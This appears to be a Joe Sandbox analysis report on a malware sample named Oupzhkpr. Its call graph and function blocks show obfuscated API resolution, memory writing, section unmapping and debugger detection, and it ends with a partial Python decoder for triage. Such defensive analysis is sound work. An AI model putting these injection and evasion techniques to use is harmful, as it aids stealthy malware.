25111 2baf92c 25109->25111 25112 2bafa39 25110->25112 25114 2ba8824 3 API calls 25111->25114 25113 2ba8824 3 API calls 25112->25113 25115 2bafa5d 25113->25115 25116 2baf950 25114->25116 25118 2bafab5 25115->25118 25117 2baf9a8 25116->25117 25120 2ba8824 3 API calls 25117->25120 25119 2ba8824 3 API calls 25118->25119 25121 2baf9cc 25119->25121 25120->25121 25122 2bafb1a 25121->25122 25123 2bafb32 25122->25123 25124 2bafb51 25123->25124 25125 2ba8824 3 API calls 25124->25125 25126 2bafb75 25125->25126 25127 2bafbae 25126->25127 25128 2bafbcd 25127->25128 25129 2bafbd8 25128->25129 25130 2ba8824 3 API calls 25129->25130 25131 2bafbf1 25130->25131 25132 2bafc28 25131->25132 25133 2bafc41 25132->25133 25134 2bafc62 25133->25134 25135 2bafc7a 25134->25135 25136 2ba8824 3 API calls 25135->25136 25137 2bafcbd 25136->25137 25138 2bafcde 25137->25138 25139 2bafce9 25138->25139 25140 2bafcf6 25139->25140 25141 2ba8824 3 API calls 25140->25141 25142 2bafd39 25141->25142 25143 2bafd65 25142->25143 25144 2bafd72 25143->25144 25145 2ba8824 3 API calls 25144->25145 25146 2bafdb5 25145->25146 25147 2bafde1 25146->25147 25148 2bafdee 25147->25148 25149 2ba8824 3 API calls 25148->25149 25150 2bafe31 25149->25150 25151 2bafe51 25150->25151 25152 2bafe7d 25151->25152 25153 2bafea9 25152->25153 25154 2ba8824 3 API calls 25153->25154 25155 2bafecd 25154->25155 25156 2bafeee 25155->25156 25157 2baff06 25156->25157 25158 2baff25 25157->25158 25159 2baff30 25158->25159 25160 2ba8824 3 API calls 25159->25160 25161 2baff49 25160->25161 25162 2baff6a 25161->25162 25163 2baff82 25162->25163 25164 2baffa1 25163->25164 25165 2baffac 25164->25165 25166 2ba8824 3 API calls 25165->25166 25167 2baffc5 25166->25167 25168 2baffcf 25167->25168 25169 2baffe7 25168->25169 25170 2bb07ab 25169->25170 25171 2baffef 25169->25171 25174 2bb07d7 25170->25174 25172 2bb0010 25171->25172 25173 2bb001b 25172->25173 25177 2bb0028 25173->25177 25175 2bb080e 25174->25175 25176 2bb081b 25175->25176 25178 2ba8824 3 API 
calls 25176->25178 25179 2ba8824 3 API calls 25177->25179 25181 2bb0827 25178->25181 25180 2bb006b 25179->25180 25182 2bb008c 25180->25182 25184 2bb0853 25181->25184 25183 2bb0097 25182->25183 25185 2bb00a4 25183->25185 25186 2bb0860 25184->25186 25189 2bb00c3 25185->25189 25187 2bb088a 25186->25187 25188 2bb0897 25187->25188 25190 2ba8824 3 API calls 25188->25190 25191 2ba8824 3 API calls 25189->25191 25192 2bb08a3 25190->25192 25193 2bb00e7 25191->25193 25196 2bb08cf 25192->25196 25194 2bb0108 25193->25194 25195 2bb0113 25194->25195 25197 2bb0120 25195->25197 25198 2bb08dc 25196->25198 25200 2bb013f 25197->25200 25199 2bb08fb 25198->25199 25202 2bb0913 25199->25202 25201 2bb014a 25200->25201 25204 2ba8824 3 API calls 25201->25204 25203 2ba8824 3 API calls 25202->25203 25205 2bb091f 25203->25205 25206 2bb0163 25204->25206 25207 2bb0941 25205->25207 25208 2bb0174 25206->25208 25209 2bb0951 25207->25209 25210 2bb0195 25208->25210 25212 2bb0972 25209->25212 25211 2bb01c1 25210->25211 25215 2bb01ed 25211->25215 25213 2bb09b4 25212->25213 25214 2bb09c1 25213->25214 25217 2ba8824 3 API calls 25214->25217 25216 2bb0205 25215->25216 25218 2ba8824 3 API calls 25216->25218 25220 2bb09cd 25217->25220 25219 2bb0211 25218->25219 25222 2bb023d 25219->25222 25221 2bb09ee 25220->25221 25224 2bb09f9 25221->25224 25223 2bb0269 25222->25223 25226 2bb0281 25223->25226 25225 2bb0a3d 25224->25225 25227 2ba8824 3 API calls 25225->25227 25228 2ba8824 3 API calls 25226->25228 25229 2bb0a49 25227->25229 25230 2bb028d 25228->25230 25231 2bb0a6a 25229->25231 25233 2bb02b9 25230->25233 25232 2bb0a75 25231->25232 25234 2bb0a82 25232->25234 25235 2bb02e5 25233->25235 25236 2bb0ab9 25234->25236 25237 2bb02fd 25235->25237 25238 2ba8824 3 API calls 25236->25238 25239 2ba8824 3 API calls 25237->25239 25240 2bb0ac5 25238->25240 25241 2bb0309 25239->25241 25244 2bb0ada 25240->25244 25242 2bb031e 25241->25242 25243 2bb0331 25242->25243 25245 2bb0352 25243->25245 25246 2bb0b0e 25244->25246 25247 
2bb035d 25245->25247 25249 2bb0b26 25246->25249 25248 2bb0389 25247->25248 25251 2bb03a1 25248->25251 25250 2bb0b50 25249->25250 25252 2ba8824 3 API calls 25250->25252 25253 2ba8824 3 API calls 25251->25253 25254 2bb0b69 25252->25254 25255 2bb03ad 25253->25255 25258 2bb0b8a 25254->25258 25256 2bb03ce 25255->25256 25257 2bb03d9 25256->25257 25260 2bb03e6 25257->25260 25259 2bb0ba2 25258->25259 25263 2bb0bcc 25259->25263 25261 2bb0405 25260->25261 25262 2bb041d 25261->25262 25265 2ba8824 3 API calls 25262->25265 25264 2ba8824 3 API calls 25263->25264 25266 2bb0be5 25264->25266 25267 2bb0429 25265->25267 25270 2bb0c06 25266->25270 25268 2bb0438 25267->25268 25269 2bb0442 25268->25269 25271 2bb044a 25269->25271 25272 2bb07a6 25269->25272 25274 2bb0c1e 25270->25274 25273 2bb046b 25271->25273 25279 2bb1fb1 25272->25279 25276 2bb0476 25273->25276 25275 2bb0c48 25274->25275 25277 2ba8824 3 API calls 25275->25277 25283 2bb04ad 25276->25283 25278 2bb0c61 25277->25278 25280 2bb0c70 25278->25280 25282 2bb1ff5 25279->25282 25281 2bb0c7f 25280->25281 25288 2bb0ca0 25281->25288 25284 2ba8824 3 API calls 25282->25284 25285 2ba8824 3 API calls 25283->25285 25286 2bb2001 25284->25286 25287 2bb04c6 25285->25287 25293 2bb2022 25286->25293 25290 2bb04f2 25287->25290 25289 2bb0cb8 25288->25289 25291 2bb0ce2 25289->25291 25294 2bb051e 25290->25294 25292 2bb0cef 25291->25292 25295 2ba8824 3 API calls 25292->25295 25296 2bb2071 25293->25296 25297 2bb0536 25294->25297 25298 2bb0cfb 25295->25298 25299 2ba8824 3 API calls 25296->25299 25300 2ba8824 3 API calls 25297->25300 25303 2bb0d1c 25298->25303 25301 2bb207d 25299->25301 25302 2bb0542 25300->25302 25304 2bb209e 25301->25304 25307 2bb056e 25302->25307 25305 2bb0d27 25303->25305 25309 2bb20a9 25304->25309 25306 2bb0d34 25305->25306 25310 2bb0d5e 25306->25310 25308 2bb059a 25307->25308 25311 2bb05b2 25308->25311 25313 2bb20ed 25309->25313 25312 2ba8824 3 API calls 25310->25312 25316 2ba8824 3 API calls 25311->25316 25314 2bb0d77 
26332->26333 26334 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26333->26334 26335 2bba0dd 26334->26335 26337 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26335->26337 26342 2bb4c0c 26336->26342 26338 2bba0ec 26337->26338 26339 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26338->26339 26340 2bba0fb 26339->26340 26341 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26340->26341 26343 2bba10a 26341->26343 26350 2bb4c29 26342->26350 26344 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26343->26344 26345 2bba119 26344->26345 26346 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26345->26346 26347 2bba128 26346->26347 26348 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26347->26348 26349 2bba137 26348->26349 26351 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26349->26351 26357 2bb4c4b 26350->26357 26352 2bba146 26351->26352 26353 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26352->26353 26354 2bba155 26353->26354 26355 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26354->26355 26356 2bba164 26355->26356 26358 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26356->26358 26357->26360 26359 2bba173 26358->26359 26361 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26359->26361 26360->25597 26362 2bba182 26361->26362 26363 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26362->26363 26364 2bba1fe 26363->26364 26365 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26364->26365 26366 2bba231 26365->26366 26367 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26366->26367 26368 2bba264 26367->26368 26369 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26368->26369 26370 2bba297 26369->26370 26371 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26370->26371 26372 2bba2ca 26371->26372 26373 2ba8824 NtWriteVirtualMemory GetModuleHandleA 
GetProcAddress 26372->26373 26374 2bba2fd 26373->26374 26375 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26374->26375 26376 2bba330 26375->26376 26377 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26376->26377 26378 2bba363 26377->26378 26379 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26378->26379 26380 2bba3df 26379->26380 26381 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26380->26381 26382 2bba45b 26381->26382 26383 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26382->26383 26384 2bba4d7 26383->26384 26385 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26384->26385 26386 2bba50a 26385->26386 26387 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26386->26387 26388 2bba53d 26387->26388 26389 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26388->26389 26390 2bba570 26389->26390 26391 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26390->26391 26392 2bba5a3 26391->26392 26393 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26392->26393 26394 2bba5d6 26393->26394 26395 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26394->26395 26396 2bba609 26395->26396 26397 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26396->26397 26398 2bba63c 26397->26398 26399 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26398->26399 26400 2bba66f 26399->26400 26401 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26400->26401 26402 2bba6a2 26401->26402 26403 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26402->26403 26404 2bba6d5 26403->26404 26405 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26404->26405 26406 2bba708 26405->26406 26407 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26406->26407 26408 2bba73b 26407->26408 26409 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26408->26409 26410 2bba76e 26409->26410 26411 2ba8824 
NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26410->26411 26412 2bba7a1 26411->26412 26413 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26412->26413 26414 2bba7d4 26413->26414 26415 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26414->26415 26416 2bba807 26415->26416 26417 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26416->26417 26418 2bba83a 26417->26418 26419 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26418->26419 26420 2bba86d 26419->26420 26421 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26420->26421 26422 2bba8a0 26421->26422 26423 2ba818c GetModuleHandleA GetProcAddress FlushInstructionCache 26422->26423 26424 2bba8af 26423->26424 26425 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26424->26425 26426 2bba92b 26425->26426 26427 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26426->26427 26428 2bba9a7 26427->26428 26429 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26428->26429 26429->25013 26431 2ba871a 26430->26431 26451 2ba80c8 26431->26451 26433 2ba8745 26455 2ba7d00 26433->26455 26435 2ba8773 26435->24987 26437 2ba8838 26436->26437 26438 2ba8020 2 API calls 26437->26438 26439 2ba886d 26438->26439 26440 2ba80c8 GetProcAddress 26439->26440 26441 2ba8886 26440->26441 26442 2ba7d00 3 API calls 26441->26442 26443 2ba88e5 26442->26443 26443->24991 26446 2baec05 26444->26446 26445 2baec32 26445->25016 26446->26445 26447 2baec20 CheckRemoteDebuggerPresent 26446->26447 26447->26445 26449 2b946aa 26448->26449 26450->25496 26452 2ba80ed 26451->26452 26453 2ba8120 GetProcAddress 26452->26453 26454 2ba814f 26453->26454 26454->26433 26456 2ba7d25 26455->26456 26462 2ba8020 26456->26462 26458 2ba7d55 26459 2ba80c8 GetProcAddress 26458->26459 26460 2ba7d5b NtWriteVirtualMemory 26459->26460 26461 2ba7d94 26460->26461 26461->26435 26463 2ba8043 26462->26463 26464 2ba80c8 GetProcAddress 26463->26464 26465 2ba8069 GetModuleHandleA 26464->26465 
26466 2ba808f 26465->26466 26466->26458

Control-flow Graph

APIs
  • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
  • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BA7A27
Strings
Memory Dump Source
• Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 421316089-445027087
• Opcode ID: 7f4ce699b978f234ab46a98c3c3ffbf5efab4e60fd9e4b4e685c002828e7361f
• Instruction ID: 3f34f69441078dbc084a05b6e4bf8f08a784129994b52d7a1ba156f48142239e
• Opcode Fuzzy Hash: 7f4ce699b978f234ab46a98c3c3ffbf5efab4e60fd9e4b4e685c002828e7361f
• Instruction Fuzzy Hash: 72116175618208BFEB00EFA4DC51E9EB7BDEB4C700F5188A1F605D7640DA30AA118B20

Control-flow Graph

APIs
  • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
  • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BA7A27
Strings
Memory Dump Source
• Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 421316089-445027087
• Opcode ID: a7d730025fbdb795187bd3c966dbfa4411728377d506afb99946ecc2005b4427
• Instruction ID: 8789199959a0e310fdd7c0d80c03df6b84800b085883bb61155c40a4a0eccd7a
• Opcode Fuzzy Hash: a7d730025fbdb795187bd3c966dbfa4411728377d506afb99946ecc2005b4427
• Instruction Fuzzy Hash: 68118075618208BFEB00EFA4DC51F9EB7BDEB4C700F5188A1F605E7640DA30AA118B20

Control-flow Graph

APIs
  • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
  • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BA82C5
Strings
Memory Dump Source
• Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
Similarity
• API ID: AddressHandleMemoryModuleProcReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
• API String ID: 2004920654-737317276
• Opcode ID: 5ad1e9089783403c47ec60bcf117f084e17541d22301215ce3451729454095d8
• Instruction ID: 649c06152a124f50e3ab9fe9bce174c39b669520b107272c93d82e667562795a
• Opcode Fuzzy Hash: 5ad1e9089783403c47ec60bcf117f084e17541d22301215ce3451729454095d8
• Instruction Fuzzy Hash: 70014075654208BFEF40EFA8D851E5E77FEEB4D700F5188A1F604D7A00D630A9118B24

Control-flow Graph

APIs
  • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
  • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BA7D74
Strings
Memory Dump Source
• Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
Similarity
• API ID: AddressHandleMemoryModuleProcVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
• API String ID: 4260932595-3542721025
• Opcode ID: aa74e6317e04218b687dc967bfe8bdd0d3d2c39335963b154b0247c9e5e38ab1
• Instruction ID: e611818d610cb29055b083b4ecdbc2a741fd0542395b11bf80997878a5df0552
• Opcode Fuzzy Hash: aa74e6317e04218b687dc967bfe8bdd0d3d2c39335963b154b0247c9e5e38ab1
• Instruction Fuzzy Hash: 120156B5618204BFDB40EFA8DC51E9EB7FDEB4D700F5188A1F504D7A40DA30A9119F24

Control-flow Graph

APIs
  • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
  • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02BA8529
Strings
Memory Dump Source
• Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
Similarity
• API ID: AddressHandleModuleProcSectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 2801472262-2520021413
• Opcode ID: 8c2a5c31913a600f359f8d6bbcb0bed1d8f2db6f9eee8246b4e7f11949545050
• Instruction ID: 7488d60942ec1a8ac07c0017bda83277f8fd0eb5edce0900d4b46c800760be91
• Opcode Fuzzy Hash: 8c2a5c31913a600f359f8d6bbcb0bed1d8f2db6f9eee8246b4e7f11949545050
• Instruction Fuzzy Hash: 13016274A58204BFEB50EFA8D861E5E77BEEB49710F518CE1F504D7A11DA34A9118A20

Control-flow Graph

APIs
  • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
  • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02BA8668
Strings
Memory Dump Source
• Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
Similarity
• API ID: AddressCreateHandleModuleProcProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 4105707577-2353454454
• Opcode ID: e3c9dbfeac82c52c2aff80b6893176ea72759ae667997593a4ae06552fefa682
• Instruction ID: f0544dd4e8147e4e9db5648a6be00a9fba03ac553e2a33591fca21aa7f36d203
• Opcode Fuzzy Hash: e3c9dbfeac82c52c2aff80b6893176ea72759ae667997593a4ae06552fefa682
• Instruction Fuzzy Hash: 7A11D6B6654208BFEB90DFACDD51F9A37EDEB0D700F5245A0FA08D7A40D634E9108B24

Control-flow Graph

APIs
  • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
  • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
• WinExec.KERNEL32(?,?), ref: 02BA8478
Strings
Memory Dump Source
• Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
Similarity
• API ID: AddressExecHandleModuleProc
• String ID: Kernel32$WinExec
• API String ID: 3450258509-3609268280
• Opcode ID: 0831b7d2ce961eb33aa09256df09c616f96cb9c1716f0c5cfdc36bda5fde112a
• Instruction ID: a3e8af9046413a9c82c67a86b46e275b87b67605d5921221c1f9bedb8f484925
• Opcode Fuzzy Hash: 0831b7d2ce961eb33aa09256df09c616f96cb9c1716f0c5cfdc36bda5fde112a
• Instruction Fuzzy Hash: 2A018175A58204BFEB10EFA8DC61F5E77EDE749700F5188A1F604D7A50DA74AD108A24

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02BA8478
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressExecHandleModuleProc
                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                      • API String ID: 3450258509-3609268280
                                                                                                                                      • Opcode ID: ec84857237c24f7c940e8813bc44d00f7f47d01ebb632b8f802dcd72c4600801
                                                                                                                                      • Instruction ID: 7fd0dd7258a7b95f49e6a09d8af6470138c7bae2cb08855de005dd1dd2407768
                                                                                                                                      • Opcode Fuzzy Hash: ec84857237c24f7c940e8813bc44d00f7f47d01ebb632b8f802dcd72c4600801
                                                                                                                                      • Instruction Fuzzy Hash: EBF0A475A58304FFEB10EFA8DC61F5E77EDE749700F5188A1F604D7A50DA74A9108B24

                                                                                                                                      Control-flow Graph

                                                                                                                                      Control-flow Graph (rendered as an image; legend: Executed / Not Executed). Basic blocks and edges recovered from the graph data:
                                                                                                                                        • 2baebf0-2baec0a: call 2b96638 -> 2baec0c or 2baec36
                                                                                                                                        • 2baec0c-2baec1e: call 2b96640 -> 2baec20 or 2baec36
                                                                                                                                        • 2baec20-2baec30: CheckRemoteDebuggerPresent -> 2baec32 or 2baec36
                                                                                                                                        • 2baec32 -> 2baec36
                                                                                                                                        • 2baec36-2baec3e: function exit
                                                                                                                                      APIs
                                                                                                                                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02BAEC29
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                                                                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                      • API String ID: 3662101638-539270669
                                                                                                                                      • Opcode ID: 6032f479602095851f60b3527a69ae2b5770bdb483484d9e5297e24418dccdff
                                                                                                                                      • Instruction ID: 7e1d2b94ef4a32129e301bb43474eff19c1999792d1f263a2cdbf76f5474c29d
                                                                                                                                      • Opcode Fuzzy Hash: 6032f479602095851f60b3527a69ae2b5770bdb483484d9e5297e24418dccdff
                                                                                                                                      • Instruction Fuzzy Hash: 58F0A77090C24CBBDB21A7A888997DCFBA99B05328F6403F4E424611D1F7754644C661
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02BA8216), ref: 02BA81F8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                                                      • String ID: FlushInstructionCache$Kernel32
                                                                                                                                      • API String ID: 2392256011-184458249
                                                                                                                                      • Opcode ID: 457c7d5d4c4f506ebd4baac4f56f9f79ae0f2a6e580b36c9ff5bf07209865db2
                                                                                                                                      • Instruction ID: c3596a6561b4805bb2871c65e517005a8993c2b8db04f4190c507326b18ccb55
                                                                                                                                      • Opcode Fuzzy Hash: 457c7d5d4c4f506ebd4baac4f56f9f79ae0f2a6e580b36c9ff5bf07209865db2
                                                                                                                                      • Instruction Fuzzy Hash: 8C01A275654304BFEB11EFA8DC61F5E77ADE709700F5148A1F604E3A00D630AD108B24
                                                                                                                                      APIs
                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc
                                                                                                                                      • String ID: Kernel32$sserddAcorPteG
                                                                                                                                      • API String ID: 190572456-1372893251
                                                                                                                                      • Opcode ID: 611a9b2bbcda9bbf84db0899ff7f2209c1ed046507ddb5918ba0c4cb7c54a095
                                                                                                                                      • Instruction ID: 84ceea3b3ce00dbd69c66a21a42847dfed1dfef8a24c59915d6c856f6b44645a
                                                                                                                                      • Opcode Fuzzy Hash: 611a9b2bbcda9bbf84db0899ff7f2209c1ed046507ddb5918ba0c4cb7c54a095
                                                                                                                                      • Instruction Fuzzy Hash: 08014F35A54304BFEF00EFA8D851E9E77BEEB4D750F5188B5F60497A10DA34A911CA24
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                      • API String ID: 1646373207-1952140341
                                                                                                                                      • Opcode ID: 77ff27abc9d49c2fbf8efdc8c80b7c95e66b0322aa5e5d0861f6a568da7c70fd
                                                                                                                                      • Instruction ID: f8fa5cca86f676f9b03afe5ba52f2039b8ae9ed91ef6bd4846405163ab7dda16
                                                                                                                                      • Opcode Fuzzy Hash: 77ff27abc9d49c2fbf8efdc8c80b7c95e66b0322aa5e5d0861f6a568da7c70fd
                                                                                                                                      • Instruction Fuzzy Hash: AAF06D71658304BFEB50EFA8D822D5E7BAEEB49740B9149E1F60493A10DA30AD148A64
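The four function blocks above describe one import-resolution chain: a GetModuleHandleA stub whose string is stored reversed ("AeldnaHeludoMteG"), a GetProcAddress stub whose string is likewise reversed ("sserddAcorPteG"), and callers that use the pair to resolve WinExec, FlushInstructionCache and CheckRemoteDebuggerPresent at run time so that none of them appears in the import table. The Python below is an added example for this report, not Joe Sandbox code and not code from the sample: it decodes the report's String ID fields (plain or reversed tokens next to a module name) into API names with a triage tag, and scans a raw byte buffer for reversed API names so the same check can be run over a memory dump. The known-API set, the tag labels, the module aliases and the sample byte buffer are constructed for illustration and are assumptions, not data from the page.

```python
"""Recover dynamically resolved Windows API names from sandbox string artifacts.

Added example for this report; not Joe Sandbox code and not code from the
sample. The API list, the tag grouping and the sample inputs below are
constructed for illustration (KNOWN_APIS is a small hand-picked subset, not
the real export tables of kernel32/kernelbase).
"""
from dataclasses import dataclass

# Constructed subset of export names to match against. For real triage,
# populate this from the export tables of the DLLs of interest.
KNOWN_APIS = {
    "GetProcAddress", "GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA",
    "WinExec", "CheckRemoteDebuggerPresent", "IsDebuggerPresent",
    "FlushInstructionCache", "VirtualProtect", "CreateToolhelp32Snapshot",
}

# Behavioural grouping used for triage (our own labels, an assumption).
TAGS = {
    "WinExec": "execution",
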